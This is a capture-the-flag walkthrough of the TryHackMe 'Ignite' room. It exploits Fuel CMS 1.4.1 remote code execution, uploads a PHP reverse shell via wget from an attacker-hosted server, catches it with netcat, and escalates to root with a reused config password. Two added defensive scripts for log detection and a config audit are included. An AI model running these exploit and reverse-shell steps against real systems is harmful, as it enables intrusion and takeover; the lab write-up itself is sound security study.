Ignite is a room that gives no instructions beyond getting two flags, User.txt and Root.txt: essentially a black box. No hand-holding or guidance of any sort. Let's put everything we've learned up until this point to use and hack the box!
Scan the Box
The first thing we should do is perform a network scan with nmap. This will show us all the open ports and the services running on them.
$ nmap x.x.x.x -A
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-12 11:00 PDT
Nmap scan report for x.x.x.x
Host is up (0.22s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/fuel/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Welcome to FUEL CMS
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.11 seconds
There is a web server on port 80; browsing to it, we are met with a welcome page. It looks like a fresh install of Fuel CMS, a content management system framework. Note that this is version 1.4.
Nmap also shows an Apache/2.4.18 service running.
Let’s see what kind of vulnerabilities we can find for these particular services.
I found a 'logrotate' Local Privilege Escalation exploit.
It involves running a script on the web server and waiting for logrotate to rotate the logs at 6:25 AM, which reboots the Apache server and sets the SUID bit on the Python 3 binary, allowing us to run Python 3 commands as root. (Let's revisit this later.)
Fuel CMS 1.4
I found a remote code execution exploit for Fuel CMS <= 1.4.1. It is a Python 2 script that achieves PHP code evaluation via the pages/select/ filter parameter. We can send commands to the server, which executes them in a shell and returns the results in the HTTP response body.
Let's download the Python script from Exploit-DB and change the URL to match the target machine's IP.
# Exploit Title: fuelCMS 1.4.1 - Remote Code Execution
# Date: 2019-07-19
# Exploit Author: 0xd0ff9
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
# Version: <= 1.4.1
# Tested on: Ubuntu - Apache2 - php5
# CVE : CVE-2018-16763

import requests
import urllib

url = "CHANGE THIS TO TARGET MACHINE IP AND PORT"

def find_nth_overlapping(haystack, needle, n):
    start = haystack.find(needle)
    while start >= 0 and n > 1:
        start = haystack.find(needle, start+1)
        n -= 1
    return start
...
Run the Python script and we are met with a command prompt. Here we can send commands to the web server, and their output is returned in the HTTP response. Let's see what directory we are in.
cmd: pwd
/var/www/html
... <html response body>
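From the defender's side, the attack above leaves a clear trace in the Apache access log: a request to the pages/select/ endpoint whose filter parameter carries PHP syntax instead of a plain search term. The following detector is an added example written for this walkthrough, not code from the room or from the Exploit-DB script. It parses constructed Apache combined-format log lines (the sample entries, client addresses and the phpinfo() filter value are all made up for the example) and flags any filter value containing quotes, parentheses or semicolons, which a legitimate page filter never needs.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Apache combined log format: client, identd, user, [timestamp], "request line",
# status, size, and optionally "referer" "user-agent".
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)

# A normal page filter is a search string; PHP expression injection into it
# needs quoting and call syntax, so these characters are the tell.
SUSPICIOUS_CHARS = set("'\"();$")

# Endpoint named on the page as carrying the vulnerable filter parameter.
VULNERABLE_PATH_FRAGMENT = "/pages/select"


def inspect_request(line):
    """Return a finding dict for a suspicious pages/select request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if VULNERABLE_PATH_FRAGMENT not in parts.path:
        return None
    params = parse_qs(parts.query, keep_blank_values=True)
    for raw in params.get("filter", []):
        # parse_qs already decodes once; a second unquote catches double-encoding.
        value = unquote(raw)
        if any(c in SUSPICIOUS_CHARS for c in value):
            return {
                "client": m.group("client"),
                "timestamp": m.group("ts"),
                "filter": value,
                "user_agent": m.group("ua") or "",
            }
    return None


def scan_log(lines):
    """Run inspect_request over every line and collect the findings."""
    return [f for f in (inspect_request(l) for l in lines) if f]


# Constructed sample log lines (not from the room): one benign filter,
# one PHP expression in the filter, one unrelated request.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/May/2020:11:05:01 -0700] "GET /fuel/pages/select/?filter=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/May/2020:11:06:14 -0700] "GET /fuel/pages/select/?filter=%27%2Bphpinfo()%2B%27 HTTP/1.1" 200 1034 "-" "python-requests/2.22.0"',
    '10.0.0.5 - - [12/May/2020:11:07:30 -0700] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Pointing scan_log at a real access log also surfaces the second stage of the walkthrough: a scripted user agent such as python-requests hitting this endpoint repeatedly, followed by a GET for a .php file that was never part of the CMS install.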
Our goal is to get a reverse shell on the machine. We can upload it to the current working directory (the web root) and access it directly in the browser without specifying additional directories in the URL.
We can find a compatible php reverse shell script here: http://pentestmonkey.net/tools/web-shells/php-reverse-shell
The reverse shell script must be modified so that it connects back to our host machine on a specified port. The host machine IP is the one TryHackMe's VPN assigns you; it can be found at https://tryhackme.com/access.
...
set_time_limit (0);
$VERSION = "1.0";
$ip = 'x.x.x.x';  // CHANGE THIS
$port = 1235;     // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
...
To transfer the reverse-shell script, we can start a Python SimpleHTTPServer on our host machine and use the wget command on the target to download the file.
Note that the directory in which you start the Python HTTP server is the directory files are served from, so make sure to start it in the same directory as your php-reverse-shell.php file.
Then we start netcat in listen mode on the port set in the reverse-shell script, navigate to the reverse-shell file path in the web browser, and boom, we have a reverse shell.
Host machine:
$ python -m SimpleHTTPServer 8000
------------------------------------
Target machine:
cmd: wget http://[host_ip]:8000/php-reverse-shell.php
------------------------------------
Host machine:
$ nc -nlvp <port from reverse-shell script>
------------------------------------
Host machine web browser:
http://[machine_ip]/php-reverse-shell.php
------------------------------------
*netcat output*
Listening on 0.0.0.0 1235
Connection received on 10.10.245.169 59774
Linux ubuntu 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 13:49:50 up 26 min,  0 users,  load average: 1.49, 1.21, 0.87
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
Now we search the server for the first flag. The room says to find "User.txt", but there is no file matching that name in any directory we have access to.
Let's search instead for all .txt files in directories we can read (the glob is quoted so the shell passes it to find rather than expanding it).
$ find / -type f -name '*.txt' 2>/dev/null
...
/home/www-data/flag.txt
...
Cat the contents of the file, and that’s the first flag!
Step 2 of 'Getting Started' on the web server's home page gives instructions for setting up the database and says where the config file is located.
The configuration file includes the root user’s credentials, including the password!
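The root of this privilege escalation is a config file that the web server account can read and that holds a password reused for the system root account. The audit below is an added example for this writeup, not code from the room or from Fuel CMS: it walks a web root, picks out config-like files, looks for credential assignments in them, and reports the file mode so you can see which secrets are exposed to group or world readers. The directory layout, file names and the placeholder password it creates are constructed for the example and are not taken from the page.

```python
import os
import re
import stat
import tempfile

# Credential-looking assignments across PHP arrays, .env, INI, YAML and JSON styles,
# e.g. $db['default']['password'] = 'x';  DB_PASSWORD=x  secret: x  "api_key": "x"
CREDENTIAL_RE = re.compile(
    r"(password|passwd|pwd|secret|api_key)\s*['\"\]]*\s*(=>|=|:)\s*['\"]?([^'\"\s;,}]+)",
    re.IGNORECASE,
)
CONFIG_SUFFIXES = (".php", ".ini", ".env", ".yml", ".yaml", ".json", ".conf")


def readable_by_others(mode):
    """True if the group or world read bit is set on the file mode."""
    return bool(mode & (stat.S_IRGRP | stat.S_IROTH))


def audit_configs(root):
    """Return one finding per non-empty credential found in a config file under root."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(CONFIG_SUFFIXES):
                continue
            path = os.path.join(dirpath, name)
            try:
                st = os.stat(path)
                with open(path, errors="replace") as fh:
                    text = fh.read()
            except OSError:
                continue
            for m in CREDENTIAL_RE.finditer(text):
                findings.append({
                    "path": os.path.relpath(path, root),
                    "key": m.group(1).lower(),
                    "mode": oct(stat.S_IMODE(st.st_mode)),
                    "group_or_world_readable": readable_by_others(st.st_mode),
                })
    return findings


def build_constructed_webroot():
    """Create a throwaway tree mimicking a CMS install; layout and values are made up."""
    root = tempfile.mkdtemp(prefix="webroot_")
    cfg_dir = os.path.join(root, "application", "config")  # assumed layout, not from the page
    os.makedirs(cfg_dir)

    db_cfg = os.path.join(cfg_dir, "database.php")
    with open(db_cfg, "w") as fh:
        fh.write("<?php\n"
                 "$db['default']['username'] = 'root';\n"
                 "$db['default']['password'] = 'CONSTRUCTED_PLACEHOLDER';\n")
    os.chmod(db_cfg, 0o644)  # readable by every local account, as a default install often leaves it

    app_cfg = os.path.join(cfg_dir, "config.php")
    with open(app_cfg, "w") as fh:
        fh.write("<?php\n$config['base_url'] = '';\n$config['encryption_key'] = '';\n")
    os.chmod(app_cfg, 0o640)
    return root


if __name__ == "__main__":
    for finding in audit_configs(build_constructed_webroot()):
        print(finding)
```

A finding with group_or_world_readable set means any local account, including a web process compromised through the CMS, can read that secret; the application itself still needs the file, so the fix is to give the config a dedicated owner and group with mode 0640, and above all never to reuse the database password for an operating system account.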
One problem: the current netcat shell we are using does not have a TTY, and without one we cannot interact with su and log in as root.
There are various methods to spawn a TTY shell, depending on what is installed on the system and what permissions you have. A resource I found is here:
The command that works in our case is:
python -c 'import pty; pty.spawn("/bin/sh")'
Now that we have a proper interactive TTY shell, we can su to root, input the password, and finally cat out the contents of root.txt to get the final flag.